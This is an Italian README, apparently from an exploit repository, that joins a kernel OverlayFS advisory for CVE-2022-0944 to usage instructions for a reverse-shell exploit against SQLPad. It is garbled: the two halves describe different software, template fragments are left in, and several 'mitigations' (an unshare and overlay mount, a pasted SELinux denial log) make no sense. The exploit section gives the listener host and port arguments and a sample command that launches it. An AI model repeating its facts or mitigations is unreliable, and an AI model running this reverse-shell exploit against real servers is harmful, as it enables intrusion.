
Exploit educativo per CVE-2022-0944 OverlayFS escalation dei privilegi con consegna del payload di reverse shell e script di rilevamento della versione del kernel.
Avviso di sicurezza e guida alla mitigazione per la vulnerabilità di escalation dei privilegi del kernel Linux in OverlayFS.
CVE-2022-0944 è una vulnerabilità di sicurezza nel sottosistema OverlayFS del kernel Linux che consente a utenti locali di escalare i privilegi attraverso una gestione impropria della creazione di file in configurazioni specifiche.

🚨 Impatto
Un utente locale potrebbe:
Ottenere privilegi di root tramite operazioni su file manipolate
Bypassare le restrizioni di sicurezza
Modificare file di sistema sensibili
Compromettere l'integrità dell'intero sistema
🔍 Rilevamento
grep CVE-2022-0944 /var/log/apt/history.log
# Per RHEL/CentOS:
rpm -q --changelog kernel | grep CVE-2022-0944
4. 🛡️ Mitigazione
Patch Ufficiali
Aggiorna a una di queste versioni corrette:
Kernel Linux 5.16.12 o successivo
Patch backportate specifiche del fornitore
Comando di aggiornamento:
sudo apt update && sudo apt upgrade linux-image-$(uname -r)
sudo yum update kernel
Soluzioni alternative (se non è possibile applicare subito la patch)
Limita l'uso di OverlayFS:
sudo modprobe -r overlay
Implementa restrizioni dei namespace:
# Crea namespace utente non privilegiato
unshare -Ur
# Monta con restrizioni utente
mount -t overlay -o lowerdir=/lower,upperdir=/upper,workdir=/work overlay /mnt
Applica policy SELinux/AppArmor: type=AVC msg=audit(1647452829.123:456): user pid=1234 comm="mount" scontext=user_u:user_r:user_t tcontext=system_u:object_r:unlabeled_t denied { mounton }
⚠️ Disclaimer Questo documento è fornito solo a scopo informativo. Sebbene siano stati fatti sforzi per garantirne l'accuratezza, non viene fornita alcuna garanzia. Testare sempre le patch in un ambiente di sviluppo prima del deployment in produzione.
Ultimo aggiornamento: 2023-10-01 | Visualizza il changelog
Caratteristiche principali:
Questo formato README è adatto per:
Desideri che:
usage: main.py [-h] url lhost lport [username] [password]
positional arguments:
url URL per SQLPad
lhost Indirizzo host dell'ascoltatore per la reverse shell
lport Porta dell'ascoltatore per la reverse shell
username Nome utente per il login (opzionale)
password Password per il login (opzionale)
options:
-h, --help mostra questo messaggio di aiuto ed esci
Esempio:
# installa i requisiti
pip install -r requirements.txt
# avvia il container docker di sqlpad
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0
# attiva l'exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin
Questo repository contiene codice e strumenti destinati esclusivamente a scopi educativi, in particolare per l'uso in corsi di cybersecurity e ambienti di apprendimento. L'autore di questo codice non si assume alcuna responsabilità per eventuali conseguenze derivanti dall'uso, dall'abuso o dalla modifica di questo codice. Il codice è fornito "così com'è" senza alcuna garanzia, esplicita o implicita, incluse ma non limitate alle garanzie implicite di commerciabilità o idoneità per uno scopo particolare.